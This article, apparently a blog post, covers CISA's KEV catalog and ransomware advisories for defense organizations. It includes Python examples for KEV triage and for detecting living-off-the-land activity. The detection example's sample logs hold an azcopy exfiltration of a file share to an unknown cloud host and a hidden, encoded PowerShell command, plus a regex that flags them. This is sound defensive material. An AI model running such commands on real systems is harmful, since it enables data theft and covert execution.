The Cybersecurity and Infrastructure Security Agency (CISA) continues to publish targeted advisories that defense organizations must treat as operational guidance, not optional reading. Recent activity through early May 2025 reinforces two enduring lessons. First, adversaries exploit known, unpatched vulnerabilities at scale. Second, ransomware and targeted intrusion campaigns keep evolving their initial access and living-off-the-land techniques. Below I outline what defense-aligned teams should prioritize immediately and how to fold CISA guidance into durable cyber-physical risk management.
What CISA is signaling right now
On May 2, 2025 CISA added two vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, a curated list that federal civilian agencies are required to remediate under BOD 22-01. The additions underscore that both enterprise backup and web frameworks remain attractive targets: a Commvault Command Center path traversal issue and a Yii framework alternate-path protection problem were added to the catalog. Inclusion in the KEV means these are actively exploited vulnerabilities and should be prioritized in vulnerability management workflows.
CISA and co-authors also continue to publish and update #StopRansomware advisories focused on variants that have hit critical sectors. In March 2025 the agency, the FBI, and MS-ISAC released a joint advisory on Medusa ransomware that describes the principal TTPs, detection methods, and initial-access patterns seen in recent campaigns. A separate advisory for the Rhysida group was updated at the end of April 2025 to refresh IOCs and observed tooling. These advisories are practical intelligence: they list observed behaviors, common exploitation vectors, and concrete mitigations meant for rapid operational use.
Why this matters to defense organizations
Defense networks and systems are high value for both espionage and disruption. The KEV process and ransomware advisories together show a predictable lifecycle. Adversaries find or reuse public exploits, weaponize them into commodity tooling or targeted campaigns, and conduct follow-on intrusion activities that can pivot to operational technology or mission systems. The cost of ignoring a KEV-listed vulnerability is not theoretical: it translates into footholds that can be used to exfiltrate sensitive data or degrade availability at scale. BOD 22-01 bridges policy and practice by mandating remediation timelines for the federal enterprise, and its logic applies equally to defense contractors and supporting commercial infrastructure.
Practical priorities for defense teams
1) Treat the KEV Catalog as a daily operational input. Integrate CISA KEV notifications into your ticketing and orchestration pipelines. Map each new KEV against your asset inventory and enforce patch or mitigation within the organization-defined SLA. If a vendor patch is not available, implement compensating controls such as network segmentation, access filtering, or temporary disablement of the affected service.
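The matching and SLA step above is easy to automate. The following is an added example, not CISA tooling or code from this article: it parses a feed excerpt shaped like the KEV JSON catalog (the field names cveID, vendorProject, product, dateAdded, dueDate and knownRansomwareCampaignUse are the ones the published feed uses), matches entries against a constructed asset inventory, and orders the resulting findings so that overdue items, known ransomware use and mission-critical assets surface first. The CVE identifiers, the due dates, the vendor "ExampleVendor" and the inventory are all constructed placeholders.

```python
"""KEV-to-inventory triage. Added illustration, not CISA tooling: the feed
excerpt, asset inventory, CVE identifiers and due dates are constructed."""
import json
from datetime import date

# Constructed excerpt in the shape of the KEV JSON feed (field names follow the
# published schema). CVE-0000-* identifiers and the due dates are placeholders.
KEV_FEED_JSON = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {"cveID": "CVE-0000-00001", "vendorProject": "Commvault", "product": "Command Center",
         "vulnerabilityName": "Commvault Command Center Path Traversal Vulnerability",
         "dateAdded": "2025-05-02", "dueDate": "2025-05-23",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-0000-00002", "vendorProject": "Yiiframework", "product": "Yii",
         "vulnerabilityName": "Yii Framework Improper Protection of Alternate Path Vulnerability",
         "dateAdded": "2025-05-02", "dueDate": "2025-05-23",
         "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-0000-00003", "vendorProject": "ExampleVendor", "product": "Example VPN Gateway",
         "vulnerabilityName": "Example VPN Gateway Authentication Bypass Vulnerability",
         "dateAdded": "2025-04-01", "dueDate": "2025-04-22",
         "knownRansomwareCampaignUse": "Known"},
    ]
})

# Constructed asset inventory. mission_tier 1 is the highest mission impact;
# "remediated" lists KEV CVEs already patched or mitigated on that asset.
INVENTORY = [
    {"host": "bkp-01", "vendor": "Commvault", "product": "Command Center", "mission_tier": 1, "remediated": []},
    {"host": "web-07", "vendor": "yiiframework", "product": "yii", "mission_tier": 2, "remediated": []},
    {"host": "web-08", "vendor": "Yiiframework", "product": "Yii", "mission_tier": 2, "remediated": ["CVE-0000-00002"]},
    {"host": "vpn-02", "vendor": "ExampleVendor", "product": "Example VPN Gateway", "mission_tier": 1, "remediated": []},
]


def load_kev(feed_json: str) -> list[dict]:
    """Return the vulnerability records from a KEV-shaped JSON document."""
    return json.loads(feed_json)["vulnerabilities"]


def _key(vendor: str, product: str) -> tuple[str, str]:
    # Case- and whitespace-insensitive join key; real inventories also need a
    # version check, which the KEV feed itself does not carry.
    return (vendor.strip().lower(), product.strip().lower())


def match_assets(kev: list[dict], inventory: list[dict]) -> list[dict]:
    """One finding per (asset, KEV entry) pair with matching vendor/product
    that the asset has not already remediated."""
    index: dict[tuple[str, str], list[dict]] = {}
    for entry in kev:
        index.setdefault(_key(entry["vendorProject"], entry["product"]), []).append(entry)
    findings = []
    for asset in inventory:
        for entry in index.get(_key(asset["vendor"], asset["product"]), []):
            if entry["cveID"] in asset.get("remediated", ()):
                continue
            findings.append({
                "host": asset["host"],
                "cve": entry["cveID"],
                "due": date.fromisoformat(entry["dueDate"]),
                "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
                "tier": asset["mission_tier"],
            })
    return findings


def prioritize(findings: list[dict], today: date) -> list[dict]:
    """Order findings: overdue first, then known ransomware use, then mission
    tier, then soonest due date. Adds days_left and overdue to each finding."""
    def rank(f: dict):
        days_left = (f["due"] - today).days
        return (days_left >= 0, not f["ransomware"], f["tier"], days_left)
    ordered = []
    for f in sorted(findings, key=rank):
        f = dict(f, days_left=(f["due"] - today).days)
        f["overdue"] = f["days_left"] < 0
        ordered.append(f)
    return ordered


def triage(today_iso: str) -> list[dict]:
    """Run the whole pipeline on the constructed data for a given date."""
    return prioritize(match_assets(load_kev(KEV_FEED_JSON), INVENTORY), date.fromisoformat(today_iso))


if __name__ == "__main__":
    for f in triage("2025-05-05"):
        status = "OVERDUE" if f["overdue"] else f"{f['days_left']}d left"
        print(f"{f['host']:8} {f['cve']:15} tier={f['tier']} ransomware={f['ransomware']} {status}")
```

In production the feed excerpt would be replaced by the downloaded catalog and the inventory by a CMDB export; the ranking key is the part to adapt, since the organization-defined SLA and mission impact model belong in that tuple.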
2) Harden remote access and reduce credential-based entry points. CISA and the joint ransomware advisories repeatedly call out compromised credentials, VPN and RMM abuse, and missing multifactor authentication as leading initial access vectors. Enforce MFA, restrict administrative access to explicit allow-lists, and implement just-in-time privileged access for elevated sessions.
3) Assume living-off-the-land activity. Recent advisories describe attackers using legitimate utilities and cloud-native CLI tools for data staging and exfiltration. Monitor for anomalous use of PowerShell, AZCopy, Storage Explorer, and other administrative binaries. Baseline normal tool usage and deploy detections that flag unusual command parameters or connections to unfamiliar cloud endpoints.
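As an added example of the baselining and detection logic described above (this code is not from the article or from any CISA advisory), the script below builds a per-user baseline of administrative binaries from a constructed window of process-creation telemetry, then flags recent events that use a tool outside that baseline, point at a cloud storage endpoint not on the organization's allow-list, or launch PowerShell with an encoded command or hidden window. All log lines, hostnames, usernames and the allow-list are constructed; the log format (pipe-delimited timestamp, host, user, image path, command line) is an assumption standing in for an EDR export.

```python
"""Living-off-the-land baseline and detection over constructed telemetry.
Added example; the log lines, users, hosts and endpoint allow-list are made up."""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed baseline window (normal activity): timestamp | host | user | image | command line
BASELINE_LOG = r"""
2025-04-03T02:10:05Z | bkp-01 | svc-backup | C:\Program Files\azcopy\azcopy.exe | azcopy.exe copy D:\backups\daily https://corpbackup.blob.core.windows.net/daily --recursive
2025-04-04T02:10:07Z | bkp-01 | svc-backup | C:\Program Files\azcopy\azcopy.exe | azcopy.exe copy D:\backups\daily https://corpbackup.blob.core.windows.net/daily --recursive
2025-04-03T09:12:44Z | adm-ws-4 | jdoe-admin | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -NoProfile -File C:\ops\rotate-logs.ps1
"""

# Constructed recent window to run detections over.
RECENT_LOG = r"""
2025-05-05T02:10:06Z | bkp-01 | svc-backup | C:\Program Files\azcopy\azcopy.exe | azcopy.exe copy D:\backups\daily https://corpbackup.blob.core.windows.net/daily --recursive
2025-05-05T03:41:12Z | fs-03 | jsmith | C:\Users\jsmith\Downloads\azcopy.exe | azcopy.exe copy E:\shares\eng https://unknown-account.example-cloud.test/x --recursive
2025-05-05T09:12:40Z | adm-ws-4 | jdoe-admin | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -NoProfile -File C:\ops\rotate-logs.ps1
2025-05-05T23:58:01Z | adm-ws-4 | jdoe-admin | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -w hidden -enc QUJDRA==
2025-05-05T10:02:13Z | fs-03 | jsmith | C:\Windows\System32\notepad.exe | notepad.exe notes.txt
2025-05-05T11:30:55Z | adm-ws-4 | jdoe-admin | C:\Users\jdoe-admin\AppData\Local\Programs\Microsoft Azure Storage Explorer\StorageExplorer.exe | StorageExplorer.exe
"""

# Constructed allow-list of organization-owned storage hosts.
KNOWN_CLOUD_ENDPOINTS = {"corpbackup.blob.core.windows.net"}
# Administrative binaries worth baselining (a short, constructed list).
ADMIN_BINARIES = {"powershell.exe", "azcopy.exe", "storageexplorer.exe", "bitsadmin.exe", "certutil.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+")
# Encoded-command and hidden-window switches, case-insensitive.
SUSPICIOUS_PS_RE = re.compile(r"(?i)(-e(nc(odedcommand)?)?\b|-w(indowstyle)?\s+hidden)")


def parse(log: str) -> list[dict]:
    """Split the pipe-delimited telemetry into event dicts; image is the bare lowercase file name."""
    events = []
    for line in log.strip().splitlines():
        ts, host, user, image, cmdline = [p.strip() for p in line.split("|", 4)]
        events.append({"ts": ts, "host": host, "user": user.lower(),
                       "image": image.lower().rsplit("\\", 1)[-1], "cmdline": cmdline})
    return events


def build_baseline(events: list[dict]) -> dict[str, set[str]]:
    """Map each user to the set of administrative binaries they normally run."""
    baseline: dict[str, set[str]] = defaultdict(set)
    for e in events:
        if e["image"] in ADMIN_BINARIES:
            baseline[e["user"]].add(e["image"])
    return baseline


def detect(events: list[dict], baseline: dict[str, set[str]]) -> list[dict]:
    """Return one alert per event that deviates from the baseline, with the reasons."""
    alerts = []
    for e in events:
        if e["image"] not in ADMIN_BINARIES:
            continue
        reasons = []
        if e["image"] not in baseline.get(e["user"], set()):
            reasons.append("tool outside user baseline")
        for url in URL_RE.findall(e["cmdline"]):
            host = urlparse(url).hostname
            if host and host not in KNOWN_CLOUD_ENDPOINTS:
                reasons.append(f"unfamiliar cloud endpoint {host}")
        if e["image"] == "powershell.exe" and SUSPICIOUS_PS_RE.search(e["cmdline"]):
            reasons.append("suspicious PowerShell parameters")
        if reasons:
            alerts.append({**e, "reasons": reasons})
    return alerts


def run_detection() -> list[dict]:
    """Baseline from the constructed normal window, then detect over the recent window."""
    return detect(parse(RECENT_LOG), build_baseline(parse(BASELINE_LOG)))


if __name__ == "__main__":
    for a in run_detection():
        print(f"{a['ts']} {a['host']} {a['user']} {a['image']}: {'; '.join(a['reasons'])}")
```

The baseline window is what keeps this useful: the backup service account copying to the corporate storage account produces no alert, while the same binary run by a user with no history of it toward an unknown endpoint produces two independent reasons. Extending the allow-list from a set to an inventory of approved storage accounts per business unit is the natural next step.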
4) Ensure backups are immutable and offline tested. Ransomware trends remain focused on double extortion. Isolated, air-gapped, or immutable backups plus tested recovery playbooks materially reduce both business impact and negotiating leverage. Tabletop and live recovery tests should include scenarios where cryptographic keys, backup credentials, or orchestration platforms are targeted.
5) Protect cyber-physical control points and C2 channels for unmanned systems. For defense organizations that integrate aerial platforms or other cyber-physical systems, apply KEV remediation and adversary TTP monitoring to both IT and OT. Harden command and control links, limit remote update capabilities, and maintain strict separation of test and production control planes. Where possible, adopt FIDO or certificate-based device authentication for critical C2 channels and verify firmware provenance before updates are accepted.
6) Use CISA playbooks and coordinate reporting. CISA provides Shields Up guidance for heightened posture and step-by-step actions for organizations of all sizes. When incidents occur, report them to CISA and law enforcement as advised in the joint advisories so that IOCs and campaign attributes feed back into broader defenses. Reporting enables faster KEV identification and more precise advisories.
Operationalizing advisories into procurement and sustainment
Adversaries exploit not only software flaws but also procurement gaps and lifecycle practices. Contract language for suppliers that support defense systems should mandate timely disclosure of vulnerabilities, patch timelines, and a defined incident notification process that aligns with federal guidance. Require vendors to demonstrate secure-by-design measures for firmware updates, supply chain attestations, and minimal default services on appliances. Incorporate KEV awareness into vendor risk assessments so that third-party components are not the silent enablers of mission risk.
Closing recommendations
CISA advisories are no longer background reading. They are operational inputs designed to reduce adversary options quickly. For defense organizations the immediate task is to move from awareness to automation: connect KEV feeds to asset inventories, prioritize remediation based on exposure and mission impact, harden remote access, and run recovery exercises that include cyber-physical contingencies. Finally, maintain a continuous feedback loop with trusted government and industry partners so that advisories become a shared defense mechanism rather than a series of checkboxes. Doing so will shrink the attack surface and make it materially harder for adversaries to turn a single exploited vulnerability into a strategic loss.